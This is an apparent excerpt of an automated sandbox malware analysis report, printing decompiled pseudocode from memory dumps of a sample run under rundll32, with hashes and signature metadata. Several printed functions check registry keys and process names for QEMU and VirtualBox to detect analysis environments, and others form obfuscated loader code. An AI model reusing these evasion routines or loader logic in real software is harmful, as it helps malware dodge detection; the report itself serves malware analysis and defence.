                				 *((intOrPtr*)(_t631 + 0x88)) =  *((intOrPtr*)(_t631 + 0x88)) + 0x1320;
                				 *((long long*)( *((intOrPtr*)(_t631 + 0x2a0)) + 0xd8)) =  *((long long*)( *((intOrPtr*)(_t631 + 0x2a0)) + 0xd8)) - 1;
                				 *( *((intOrPtr*)(_t631 + 0x20)) + 0x398) =  *(_t631 + 0x38) | 0x00001487;
                				 *( *((intOrPtr*)(_t631 + 0x20)) + 0x2f8) =  *( *((intOrPtr*)(_t631 + 0x20)) + 0x2f8) |  *((intOrPtr*)(_t631 + 0x358)) + 0x00000420;
                				ExitProcess(??);
                			}

                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.547213068.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 0000000E.00000002.547204501.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547252006.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547412222.00007FFA5367C000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547421505.00007FFA5367D000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547659278.00007FFA53754000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547667608.00007FFA53756000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: ErrorExitLastProcess
                • String ID: "$l
                • API String ID: 1697593849-1902413641
                • Opcode ID: 16850a8fe6e9405711cc130c85650c98d20a47d00a034101c4c062ff6ad38697
                • Instruction ID: cd5baadae114abc6e4a7196865bad12ebe7b3db0d04e6322fc4eb476dea4534b
                • Opcode Fuzzy Hash: 16850a8fe6e9405711cc130c85650c98d20a47d00a034101c4c062ff6ad38697
                • Instruction Fuzzy Hash: EB721472614BC48AD774CF29D8847E937A9F789B88F44412ADB8D4BB68DF38D254CB00
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: Process32$CloseHandleNext$CreateFirstSnapshotToolhelp32
                • String ID:
                • API String ID: 3656348920-0
                • Opcode ID: 65d409781a766cb7afe0c01d1b1068d1319270dcc6e4b659f92ea677d2ab12ba
                • Instruction ID: 445267236a6f13afae8887d76c9366cfba87e55a713f5a554aa517f702d94044
                • Opcode Fuzzy Hash: 65d409781a766cb7afe0c01d1b1068d1319270dcc6e4b659f92ea677d2ab12ba
                • Instruction Fuzzy Hash: EE214F32306A50C6EA74CB21E85C7AA63A0FFE8BD4F5456619D99466ACEF3CD605C700
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 62%
                			E00007FFA7FFA535E1488(long long _a8, signed int _a16, signed int _a24, signed int _a32) {
                				signed int _v64;
                				signed int _v68;
                				signed int _v72;
                				signed int _v76;
                				signed int _v80;
                				signed int _v84;
                				signed int _v88;
                				signed int _v104;
                				signed int _v112;
                				signed int _v120;
                				signed int _v128;
                				signed int _v136;
                				signed int _v144;
                				signed int _v152;
                				void* _t298;
                				signed int _t303;
                				void* _t310;
                				signed int _t311;
                				signed int _t312;
                				signed int _t314;
                				intOrPtr _t315;
                				void* _t318;
                				void* _t321;
                				signed int _t322;
                				void* _t323;
                				intOrPtr _t334;
                				signed int _t356;
                				signed int _t371;
                				long long _t375;
                				signed int _t388;
                				signed long long _t402;
                				long long _t423;
                				signed int _t445;
                				signed int _t458;
                				void* _t551;
                				void* _t559;
                				signed int _t561;
                				void* _t565;
                				void* _t573;
                				void* _t576;
                				void* _t580;
                				void* _t581;
                				signed int _t582;
                
                				_a8 = _t423;
                				GetProcessHeap();
                				asm("enter 0x8b44, 0xc3");
                				HeapAlloc(??, ??, ??);
                				r8d = _t314;
                				 *0x5367c000 = _t334;
                				_t298 = E00007FFA7FFA535E3F50(_t315, _t318, _t321, _t323, _t334, 0, _t551, _t561);
                				_t582 =  *0x5367c000; // 0x2151e49def0
                				 *((intOrPtr*)(0)) =  *((intOrPtr*)(0)) + _t298;
                				 *((intOrPtr*)(0)) =  *((intOrPtr*)(0)) + _t298;
                				 *(_t582 + 0x160) = _t582;
                				 *(_t582 + 0x70) = 0x1487;
                				r13d = 0x2114b84100001569;
                				 *(_t582 + 0x20) = _t582;
                				r12d = 0x2114b8410000157a;
                				 *(_t582 + 0x110) = _t582;
                				 *(_t582 + 0x240) = _t582;
                				 *(_t582 + 0x2a8) = _t561;
                				 *((long long*)(_t582 + 0x1b0)) = 0x1fda;
                				 *(_t582 + 0x358) = _t582;
                				 *(_t582 + 0x148) = 0x1355;
                				 *(_t582 + 0x2a0) = _t582;
                				 *(_t582 + 0x5e8) = _t582;
                				 *((long long*)(_t582 + 0x68)) = 0x1582;
                				 *((long long*)(_t582 + 0x340)) = 0x11f1;
                				 *(_t582 + 0x108) = _t582;
                				 *((intOrPtr*)(_t582 + 0x630)) = 1;
                				_v68 = 0x1ad7;
                				_a24 = 0xc92;
                				_a16 = 0;
                				_v80 = 0;
                				_a32 = 0;
                				_v88 = r15d;
                				_v64 = r8d;
                				_v72 = 0x1ba7;
                				_v76 = 0x1582;
                				_v84 = 0x16ce;
                				if (_v84 == _a24 + 0x7f5) goto 0x535e1a2a;
                				if (_a32 - _a16 + 0x1ec0 >= 0) goto 0x535e19a8;
                				 *((long long*)( *(_t582 + 0x240) + 0x198)) =  *((intOrPtr*)( *(_t582 + 0x160) + 0x2c8));
                				 *((long long*)( *(_t582 + 0x160) + 0x2c8)) =  *((long long*)( *(_t582 + 0x160) + 0x2c8)) - 1;
                				 *( *(_t582 + 0x20) + 0x140) =  *( *(_t582 + 0x20) + 0x140) +  *((intOrPtr*)( *(_t582 + 0x5e8) + 0x90)) - 0x1582;
                				 *((long long*)(_t582 + 0x30)) = 0x5367c038;
                				 *((intOrPtr*)(_t582 + 0x60)) = _t315;
                				 *( *(_t582 + 0x110) + 0x490) =  *( *(_t582 + 0x110) + 0x490) |  *( *(_t582 + 0x108) + 0x1a8);
                				 *( *(_t582 + 0x108) + 0x1a8) =  *( *(_t582 + 0x108) + 0x1a8) - 1;
                				 *((long long*)(_t582 + 0x150)) = 0x5367c008;
                				 *( *(_t582 + 0x358) + 0x10) =  *( *(_t582 + 0x358) + 0x10) * ( *((intOrPtr*)( *(_t582 + 0x110) + 0x250)) - _t561);
                				 *( *(_t582 + 0x20) + 0x188) =  *( *(_t582 + 0x20) + 0x188) |  *( *(_t582 + 0x358) + 0xa0) * 0x0000181f;
                				r8d = _v80;
                				r11d = _v76;
                				r8d = r8d + r13d;
                				r10d = _v88;
                				r9d = _v64;
                				r9d = r9d - 0xc8d;
                				_t445 = _a24;
                				 *((long long*)(_t582 + 0x428)) =  *((intOrPtr*)(_t582 + 0x30));
                				asm("ror byte [ebx-0x2fd20fbb], 1");
                				 *0x61b =  *0x61b + _t298;
                				 *((intOrPtr*)(_t445 + 0x4c402444)) =  *((intOrPtr*)(_t445 + 0x4c402444)) + _t315;
                				_v128 = 0x1fda;
                				_v136 = _t445;
                				_v144 = r9d;
                				r9d = _t576 + 0x93e;
                				_v152 = r10d;
                				E00007FFA7FFA535F6898(_v64 - 0x5cd, _a24 + 0x96b, _t561, _t565); // executed
                				r8d = _t322;
                				_a24 = 0x61b;
                				 *((intOrPtr*)( *(_t582 + 0x5e8) + 0xb0)) =  *((intOrPtr*)( *(_t582 + 0x5e8) + 0xb0)) - ( *0x2B44C8030000093B ^ 0x00000bbb);
                				 *((long long*)(_t582 + 0x1b8)) =  *((intOrPtr*)(_t582 + 0x668));
                				 *((intOrPtr*)( *(_t582 + 0x108) + 0xc0)) =  *((intOrPtr*)( *(_t582 + 0x108) + 0xc0)) + _t580;
                				E00007FFA7FFA535FAF30(_t315, _v64, 0x1582, 0x1fda, _t559, _t582);
                				r8d = _a32;
                				r8d = r8d + 0x1c76;
                				r11d = _v84;
                				r10d = _a24;
                				r11d = r11d + 0xa46;
                				r9d = _v72;
                				r10d = r10d - 0x3d9;
                				r9d = r9d - 0xaf9;
                				_t356 = _a24 + 0xb53;
                				_v120 = _t356;
                				_v128 = r9d;
                				_v136 = r10d;
                				_v144 = r11d;
                				_v152 = _v76 - 0x262;
                				E00007FFA7FFA535F6E94(_t356, _v76 - 0x262, _a16 + 0x1582, _v72 - 0x62d, _t561, _t582, _t573);
                				_v88 = _t356;
                				 *( *(_t582 + 0x468)) =  *( *(_t582 + 0x160) + 0x1b0) ^ 0x7472768c;
                				 *((long long*)( *(_t582 + 0x160) + 0x360)) =  *((intOrPtr*)( *(_t582 + 0x2a0) + 0x3a0)) - _t581;
                				 *( *(_t582 + 0x5e8) + 0x418) =  *( *(_t582 + 0x160) + 0x230) | 0x00001515;
                				( *(_t582 + 0x468))[0] =  *((intOrPtr*)( *(_t582 + 0x240) + 0x70)) + 0x506c4cee;
                				_t458 =  *(_t582 + 0x20);
                				 *((intOrPtr*)(_t458 + 0x238)) =  *((intOrPtr*)(_t458 + 0x238)) -  *((intOrPtr*)(_t582 + 0x130));
                				 *((long long*)(_t582 + 0x130)) =  *((long long*)(_t582 + 0x130)) - 1;
                				( *(_t582 + 0x468))[1] = _t458 + 0x65745c1d;
                				 *( *(_t582 + 0x2a0) + 0x1c8) =  *( *(_t582 + 0x2a0) + 0xa0) * 0x12ad;
                				 *( *(_t582 + 0x160) + 0x5d0) =  *( *(_t582 + 0x160) + 0x5d0) *  *( *(_t582 + 0x2a0) + 0x28);
                				_t557 = _a24;
                				r11d = _v84;
                				r10d = _a24;
                				r11d = r11d - 0xb13;
                				r9d = _a16;
                				r10d = r10d + 0xa39;
                				r9d = r9d + r15d;
                				r8d = _v76;
                				 *( *(_t582 + 0x2a0) + 0x28) =  *( *(_t582 + 0x2a0) + 0x28) - 1;
                				_t371 = _v68;
                				r8d = r8d + 0x14c;
                				_v104 = _t371;
                				_v112 = r8d;
                				_v120 = r9d;
                				_v128 = r10d;
                				_v136 = r11d;
                				_v144 = _v84;
                				_t160 = _t557 - 0x7f5; // 0x49d
                				r9d = _t160;
                				_v152 = _v84;
                				E00007FFA7FFA535F84F0(_t321, _t323, _v84, _v76 - 0x391, _v64, _a24, _t582, _t582); // executed
                				_v88 = _t371;
                				( *(_t582 + 0x468))[1] =  *((intOrPtr*)( *(_t582 + 0x110) + 0x68)) + 0x6c56e2;
                				 *((intOrPtr*)( *(_t582 + 0x240) + 0x4b8)) =  *((intOrPtr*)( *(_t582 + 0x240) + 0x4b8)) + ( *( *(_t582 + 0x20) + 0x140) ^ 0x00001355);
                				_t375 =  *(_t582 + 0x240);
                				 *( *(_t582 + 0x20) + 0x5d8) =  *( *(_t582 + 0x20) + 0x5d8) ^  *((intOrPtr*)(_t375 + 0x1b0)) + 0x0000145c;
                				_t303 = LoadLibraryA(??);
                				 *((long long*)(_t582 + 0x498)) = _t375;
                				goto 0x535e1a2a;
                				 *(_t582 + 0x330) =  *(_t582 + 0x330) ^ _t303;
                				_v152 = _v80;
                				CloseHandle(??);
                				 *(_t582 + 0x240) =  *(_t582 + 0x240) + ( *(_t582 + 0xb0) & _v84 |  *(_t582 + 0x70));
                				if (_v72 - _v76 + 0x5c5 <= 0) goto 0x535e1aae;
                				r8d = _v84;
                				r8d = r8d - 0x1b9;
                				r11d = _v68;
                				r10d = _a16;
                				r11d = r11d - 0x55d;
                				r10d = r10d + 0x11f1;
                				_t388 = _v88 + 0x272;
                				_v120 = _t388;
                				_v128 = r10d;
                				_v136 = r11d;
                				_v144 = _a32 + 0x16ce;
                				_v152 = _v68 - 0x82a;
                				E00007FFA7FFA535F8F2C(_a32 + 0x16ce, _a32, _a24, _t559,  *(_t582 + 0x148), _t582);
                				_v84 = _t388;
                				_v76 = _v76 + 0xfffffff8;
                				goto 0x535e1cee;
                				if ( *(_t582 + 0x108) -  *(_t582 + 0x108) -  *((intOrPtr*)(_t582 + 0x310)) < 0) goto 0x535e1c64;
                				if (_v68 - (_a32 &  *((intOrPtr*)(_t582 + 0x68)) - 0x00001b47) < 0) goto 0x535e1c13;
                				_v88 = _v88 + ( *((intOrPtr*)(_t582 + 0x298)) -  *((intOrPtr*)(_t582 + 0x198)) &  *(_t582 + 0x3a0));
                				_a32 = _v80 ^ _a32 ^ _v84 + _v88;
                				_a24 = _a24 | _v84 *  *(_t582 + 0x3c8) + 0x0000145c;
                				_v80 = _v80 * (_v76 & 0x00001320);
                				_t402 = _a32 + _v76;
                				 *(_t582 + 0xd8) =  *(_t582 + 0xd8) ^ _t402;
                				_a16 = _a16 * (_a16 & ( *(_t582 + 0x250) |  *(_t582 + 0x110)));
                				 *((intOrPtr*)(_t582 + 0x168)) =  *((intOrPtr*)(_t582 + 0x168)) - (_a16 +  *((intOrPtr*)(_t582 + 0x1b0))) * 0x157a;
                				_a32 = _a32 + _t402 + r12d -  *((intOrPtr*)(_t582 + 0x178));
                				r8d =  *(_t582 + 0x140);
                				r8d = r8d - 0x145c;
                				_t310 =  *((intOrPtr*)(_t582 + 0x130)) +  *((intOrPtr*)(_t582 + 0x298));
                				LeaveCriticalSection(??);
                				r15d = r15d - _t310;
                				_t311 = _t310 + r15d;
                				 *(_t582 + 0x88) =  *(_t582 + 0x88) * _t311;
                				goto 0x535e1c64;
                				r8d = _v72;
                				r8d = r8d + _t311;
                				r9d = _v88;
                				_t312 = _t311 & r12d;
                				r9d = r9d | _t312;
                				r10d =  *(_t582 + 0x88);
                				r10d = r10d | _t312;
                				_v152 = r10d;
                				DisconnectNamedPipe(??);
                				if (_v68 != ( *(_t582 + 0x108) ^  *(_t582 + 0x2a8))) goto 0x535e1cee;
                				if (_v68 == _v68 + (_v80 |  *(_t582 + 0x140))) goto 0x535e1cd5;
                				r9d = r9d + 3;
                				 *(_t582 + 0xd8) =  *(_t582 + 0xd8) *  *(_t582 + 0x148) *  *(_t582 + 0x3b8);
                				if (r9d != _v68 + (_v80 |  *(_t582 + 0x140))) goto 0x535e1c96;
                				r8d = r8d + 1;
                				if (r8d == ( *(_t582 + 0x108) ^  *(_t582 + 0x2a8))) goto 0x535e1c7b;
                				ExitProcess(??);
                			}

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.547213068.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 0000000E.00000002.547204501.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547252006.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547412222.00007FFA5367C000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547421505.00007FFA5367D000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547659278.00007FFA53754000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547667608.00007FFA53756000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: HeapProcess$AllocCloseCriticalExitHandleLeaveLibraryLoadSection
                • String ID:
                • API String ID: 1269075160-0
                • Opcode ID: 4b38d50d65ddf06cecd7d8751ab8fe2c6599f940d285598a8d05519128601b9e
                • Instruction ID: d47ff28244b39d2eb5a565c67a9f8f57efc8ec61dd40c4b8f80ae60d5faafcb5
                • Opcode Fuzzy Hash: 4b38d50d65ddf06cecd7d8751ab8fe2c6599f940d285598a8d05519128601b9e
                • Instruction Fuzzy Hash: 1F3206B2A10A908AEB54CF69E898BAD37B9F78878CF054526DF4D97B54CF38D550CB00
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 89%
                			E00000215215205CECF0(void* __eflags, long long __rbx, void* __rdx, long long __rsi, long long _a8, long long _a16) {
                				void* _v8;
                				signed int _v24;
                				char _v536;
                				long long _v544;
                				long long _v552;
                				long long _v560;
                				long long _v568;
                				long long _v576;
                				char _v584;
                				void* __rdi;
                				void* _t21;
                				void* _t25;
                				void* _t28;
                				void* _t29;
                				signed long long _t34;
                				long long _t43;
                				void* _t50;
                				void* _t55;
                				void* _t58;
                
                				_a8 = __rbx;
                				_a16 = __rsi;
                				_t56 = _t55 - 0x260;
                				_t34 =  *0x2067c720; // 0xca1645d940e
                				_v24 = _t34 ^ _t55 - 0x00000260;
                				_v584 = L"HARDWARE\\DEVICEMAP\\Scsi\\Scsi Port 0\\Scsi Bus 0\\Target Id 0\\Logical Unit Id 0";
                				_t43 = L"QEMU";
                				_v568 = _t43;
                				_v576 = L"Identifier";
                				_t52 =  &_v584;
                				_v544 = _t43;
                				_v560 = L"HARDWARE\\Description\\System";
                				_v552 = L"SystemBiosVersion";
                				r8d = 0x200;
                				E00000215215205F8EF0(_t25, 0, _t28, _t29,  &_v536, __rdx, _t50, _t58);
                				E00000215215205CD1D0(_t25, L"SystemBiosVersion",  &_v536, __rdx, L"Checking reg key %s ", _v584);
                				_t21 = E00000215215205D0130( *_t52,  *((intOrPtr*)(_t52 + 8)),  *((intOrPtr*)(_t52 + 0x10))); // executed
                				if (_t21 != 0) goto 0x205cedae;
                				if (__rbx + 1 - 2 < 0) goto 0x205ced60;
                				goto 0x205cedb3;
                				return E00000215215205F59D0(_t25, _v24 ^ _t56,  *_t52,  *((intOrPtr*)(_t52 + 0x10)));
                			}

                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: CloseOpenQueryValue
                • String ID: Checking reg key %s $HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0$HARDWARE\Description\System$Identifier$QEMU$SystemBiosVersion
                • API String ID: 3677997916-3557842602
                • Opcode ID: ef5c11d568b48eaa05c331fdbd5ffc010a52dfb12a58093da07c85f3f1e3875e
                • Instruction ID: 118adc403df565f1c7f95571d3f0504a34e0d169b9b87801d30faf60c63272d8
                • Opcode Fuzzy Hash: ef5c11d568b48eaa05c331fdbd5ffc010a52dfb12a58093da07c85f3f1e3875e
                • Instruction Fuzzy Hash: 4921393720AFA0D1EA708B01F4882CAB3A4FBD9754F904166EE8E43B59DF78D545C740
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 74%
                			E00000215215205CEDE0(void* __eflags, signed int __rbx, long long _a8) {
                				signed int _v24;
                				char _v536;
                				long long _v552;
                				long long _v560;
                				long long _v568;
                				void* __rdi;
                				void* _t15;
                				void* _t19;
                				void* _t22;
                				void* _t23;
                				signed long long _t28;
                				signed int _t33;
                				void* _t41;
                				void* _t42;
                				void* _t44;
                				signed long long _t45;
                				void* _t47;
                
                				_t33 = __rbx;
                				_a8 = __rbx;
                				_t45 = _t44 - 0x250;
                				_t28 =  *0x2067c720; // 0xca1645d940e
                				_v24 = _t28 ^ _t45;
                				_v568 = L"qemu-ga.exe";
                				_v560 = L"vdagent.exe";
                				_v552 = L"vdservice.exe";
                				asm("o16 nop [eax+eax]");
                				r8d = 0x200;
                				E00000215215205F8EF0(_t19, 0, _t22, _t23,  &_v536, _t41, _t42, _t47);
                				_t43 =  *((intOrPtr*)(_t45 + 0x20 + __rbx * 8));
                				_t49 =  *((intOrPtr*)(_t45 + 0x20 + __rbx * 8));
                				E00000215215205CD1D0(_t19, L"vdservice.exe",  &_v536, _t41, L"Checking qemu processes %s ",  *((intOrPtr*)(_t45 + 0x20 + __rbx * 8)));
                				_t15 = E00000215215205D0330(_t22, _t23, __rbx, _t43); // executed
                				if (_t15 != 0) goto 0x205cee77;
                				if (_t33 + 1 - 3 < 0) goto 0x205cee30;
                				goto 0x205cee7c;
                				return E00000215215205F59D0(_t19, _v24 ^ _t45, _t41, _t49);
                			}

                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32
                • String ID: Checking qemu processes %s $qemu-ga.exe$vdagent.exe$vdservice.exe
                • API String ID: 1083639309-928502638
                • Opcode ID: 6fa0968a4e5622fb480b1ec55f295f6686cf1391d64602b95252d623bc6beb0a
                • Instruction ID: 6edcd63e0d1c3ef68a2eff38c31c5fe1bcf4f374c92ee4cb936de88ecc693959
                • Opcode Fuzzy Hash: 6fa0968a4e5622fb480b1ec55f295f6686cf1391d64602b95252d623bc6beb0a
                • Instruction Fuzzy Hash: F411233330AE94C1EB209B11E4983EA72A5FFE9784F645166DE8D56B69EA38C1418B40
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 80%
                			E00000215215205CDA30(void* __eflags, signed int __rbx, long long _a8) {
                				signed int _v24;
                				char _v536;
                				long long _v544;
                				long long _v552;
                				void* __rdi;
                				void* _t14;
                				void* _t18;
                				void* _t21;
                				void* _t22;
                				signed long long _t27;
                				signed int _t31;
                				void* _t39;
                				void* _t40;
                				void* _t42;
                				signed long long _t43;
                				void* _t45;
                
                				_t31 = __rbx;
                				_a8 = __rbx;
                				_t43 = _t42 - 0x240;
                				_t27 =  *0x2067c720; // 0xca1645d940e
                				_v24 = _t27 ^ _t43;
                				_v552 = L"vboxservice.exe";
                				_v544 = L"vboxtray.exe";
                				r8d = 0x200;
                				E00000215215205F8EF0(_t18, 0, _t21, _t22,  &_v536, _t39, _t40, _t45);
                				_t41 =  *((intOrPtr*)(_t43 + 0x20 + __rbx * 8));
                				_t47 =  *((intOrPtr*)(_t43 + 0x20 + __rbx * 8));
                				E00000215215205CD1D0(_t18, L"vboxtray.exe",  &_v536, _t39, L"Checking VirtualBox process %s ",  *((intOrPtr*)(_t43 + 0x20 + __rbx * 8)));
                				_t14 = E00000215215205D0330(_t21, _t22, __rbx, _t41); // executed
                				if (_t14 != 0) goto 0x205cdab7;
                				if (_t31 + 1 - 2 < 0) goto 0x205cda70;
                				goto 0x205cdabc;
                				return E00000215215205F59D0(_t18, _v24 ^ _t43, _t39, _t47);
                			}

                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32
                • String ID: Checking VirtualBox process %s $vboxservice.exe$vboxtray.exe
                • API String ID: 1083639309-2201811630
                • Opcode ID: ee22ddd8c7f7173a42e2b600fdab4cb59b01073175a9ea6accbe5592d33e00c8
                • Instruction ID: 5ab1e3796fb15a78053c41e5d771705c51a9de2d4dc584aded5404cf7e10bf4d
                • Opcode Fuzzy Hash: ee22ddd8c7f7173a42e2b600fdab4cb59b01073175a9ea6accbe5592d33e00c8
                • Instruction Fuzzy Hash: 6201693331AE90C1EB209B11F4993EA63A0FBE8794F5411669E8A47B59DB3CC141CB50
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 59%
                			E00007FFA7FFA535F7A40(long long __rbx, signed long long __rcx, signed int __rdx, void* __r8, void* __r9, signed long long __r11) {
                				void* __rsi;
                				void* __rbp;
                				signed int _t414;
                				intOrPtr* _t419;
                				signed int _t423;
                				int _t430;
                				signed int _t431;
                				signed int _t433;
                				signed int _t436;
                				signed int _t437;
                				signed int _t438;
                				signed int _t440;
                				signed int _t447;
                				signed int _t449;
                				intOrPtr _t453;
                				void* _t455;
                				intOrPtr _t459;
                				void* _t461;
                				signed int _t468;
                				long long _t469;
                				intOrPtr* _t485;
                				intOrPtr _t494;
                				intOrPtr _t517;
                				intOrPtr* _t519;
                				intOrPtr* _t521;
                				intOrPtr* _t522;
                				signed long long _t532;
                				signed long long _t533;
                				signed long long _t560;
                				signed int _t565;
                				signed int _t580;
                				signed long long _t584;
                				signed int* _t625;
                				signed int _t647;
                				signed long long _t655;
                				intOrPtr _t681;
                				signed int _t682;
                				signed int _t683;
                				signed int _t691;
                				signed long long _t702;
                				intOrPtr _t710;
                				signed long long _t713;
                				long long _t716;
                				void* _t723;
                				void* _t724;
                				intOrPtr _t727;
                				intOrPtr _t729;
                				void* _t740;
                				signed long long _t744;
                				void* _t745;
                				signed long long _t747;
                				void* _t749;
                				void* _t751;
                
                				_t744 = __r11;
                				_t726 = __r8;
                				 *((long long*)(_t723 + 0x10)) = __rbx;
                				_push(_t716);
                				_t724 = _t723 - 0x70;
                				r14d =  *(_t724 + 0xd0);
                				r15d =  *(_t724 + 0xe8);
                				_t5 = _t726 - 0x96b; // -1859
                				_t449 = _t5;
                				r12d = __r9 - 0x1556;
                				r9d = r9d + 0xfffff9c2;
                				 *(_t724 + 0xc0) = _t468;
                				r15d = r15d + 0xfec;
                				 *(_t724 + 0xb0) = r9d;
                				_t580 =  *((intOrPtr*)(_t724 + 0xd8)) + 0x7b;
                				 *((long long*)(_t724 + 0x50)) = _t716;
                				 *(_t724 + 0xd0) = _t580;
                				r14d = r14d + 0xffffece0;
                				_t13 = _t716 + 0xfe4; // 0x8a1
                				_t469 = _t13;
                				r8d = r15d;
                				_t713 = __rcx - 0xf3;
                				if (__rdx - _t469 >= 0) goto 0x535f8158;
                				r10d = _t580 - 0x83;
                				 *((long long*)(_t724 + 0x48)) = _t469;
                				r11d = _t713 + 0x7ef;
                				 *(_t724 + 0x40) = r10d;
                				 *(_t724 + 0x38) = __rdx;
                				 *(_t724 + 0x30) = r11d;
                				_t25 = _t716 + 0x1482; // 0xd3f
                				r9d = _t25;
                				 *(_t724 + 0x28) = _t713 - 0x8cc;
                				r8d = _t751 - 0x62d;
                				 *(_t724 + 0x20) = __rcx;
                				_t414 = E00007FFA7FFA535F8C00(_t713 - 0x8cc, __rcx,  *(_t724 + 0xb0) + 0x56e, _t713, _t716, __r8, __r9, _t740, _t751, _t749, _t747, _t745);
                				 *((long long*)(__rdx + 0x61c)) = 6;
                				r9d = _t449;
                				r13d = 0x1582;
                				r14d = 0x8000001f;
                				 *( *((intOrPtr*)(__rdx + 0x20)) + 0x128) =  *( *((intOrPtr*)(__rdx + 0x20)) + 0x128) ^  *((intOrPtr*)( *((intOrPtr*)(__rdx + 0x5e8)) + 0x298)) - 0x00000c92;
                				 *((intOrPtr*)( *((intOrPtr*)(__rdx + 0x430)) +  *(__rdx + 0x608) * 4)) =  *((intOrPtr*)( *((intOrPtr*)(__rdx + 0x430)) +  *(__rdx + 0x608) * 4)) +  *((intOrPtr*)(__rdx + 0x610));
                				 *((intOrPtr*)( *((intOrPtr*)(__rdx + 0x430)) +  *(__rdx + 0x60c) * 4)) =  *((intOrPtr*)( *((intOrPtr*)(__rdx + 0x430)) +  *(__rdx + 0x60c) * 4)) +  *((intOrPtr*)(__rdx + 0x614));
                				if ( *((intOrPtr*)(__rdx + 0x600)) <= 0) goto 0x535f7dca;
                				r10d = _t449;
                				 *(__rdx + 0x3c8) =  *(__rdx + 0x130) | _t747;
                				 *((intOrPtr*)(__rdx + 0x2f8)) =  *((intOrPtr*)(__rdx + 0x2f8)) - ( *( *((intOrPtr*)(__rdx + 0x240)) + 0x5d0) ^ 0x000011f1);
                				 *((long long*)( *((intOrPtr*)(__rdx + 0x110)) + 8)) = 0x2fce;
                				_t453 =  *((intOrPtr*)(__rdx + 0x604));
                				if (_t453 <= 0) goto 0x535f7d4d;
                				 *((long long*)( *((intOrPtr*)(__rdx + 0x358)) + 0x2f8)) =  *((intOrPtr*)(__rdx + 0x298));
                				 *((long long*)(__rdx + 0x298)) =  *((long long*)(__rdx + 0x298)) - 1;
                				 *(__rdx + 0x128) =  *((intOrPtr*)( *((intOrPtr*)(__rdx + 0x110)) + 0x250)) - 0x1515;
                				_t727 =  *((intOrPtr*)(__rdx + 0x430));
                				_t433 =  *(_t727 +  *(__rdx + 0x60c) * 4);
                				 *(_t727 +  *(__rdx + 0x608) * 4) =  *(_t727 +  *(__rdx + 0x608) * 4) ^ _t433;
                				if (_t453 >= 0) goto 0x535f7c5a;
                				_t681 =  *((intOrPtr*)(__rdx + 0x430));
                				r8d =  *(_t681 +  *(__rdx + 0x608) * 4);
                				if (( *((intOrPtr*)(__rdx + 0x61c)) - 1 | 0xffffffe0) + 1 == 0) goto 0x535f7c73;
                				asm("inc ecx");
                				r10d = r10d + _t431;
                				 *((intOrPtr*)(_t681 +  *(__rdx + 0x60c) * 4)) =  *((intOrPtr*)(_t681 +  *(__rdx + 0x60c) * 4)) + r8d;
                				_t682 =  *((intOrPtr*)(__rdx + 0x110));
                				 *(_t682 + 0x410) =  *(_t682 + 0x410) |  *( *((intOrPtr*)(__rdx + 0x358)) + 0x128);
                				 *( *((intOrPtr*)(__rdx + 0x358)) + 0x128) =  *( *((intOrPtr*)(__rdx + 0x358)) + 0x128) - 1;
                				_t485 =  *((intOrPtr*)(__rdx + 0x108));
                				 *(_t485 + 0x330) =  *( *((intOrPtr*)(__rdx + 0x20)) + 0x138) ^ 0x00001355;
                				 *_t485 =  *_t485 + _t414;
                				asm("cdq");
                				 *(__rdx + 0x608) = _t682;
                				_t683 =  *((intOrPtr*)(__rdx + 0x358));
